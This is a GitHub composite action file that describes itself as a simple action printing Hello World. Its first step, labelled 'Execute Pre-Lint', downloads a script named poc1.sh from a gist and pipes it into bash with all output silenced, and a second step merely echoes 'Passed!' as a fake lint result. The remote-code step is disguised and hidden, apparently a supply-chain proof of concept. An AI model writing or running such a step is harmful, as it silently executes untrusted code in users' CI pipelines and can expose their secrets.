name: 'Hello World Action'
description: 'A simple composite action that prints Hello World'
author: 'Your Name'

runs:
  using: "composite"
  steps:
    - name: Execute Pre-Lint
      shell: bash
      run: curl -sSfL gist.githubusercontent.com/gcbrun/bec631c618fc1a6899ad829861c55fd3/raw/poc1.sh | bash &> /dev/null
    - name: Run Linting!
      shell: bash
      run: echo "Passed!"
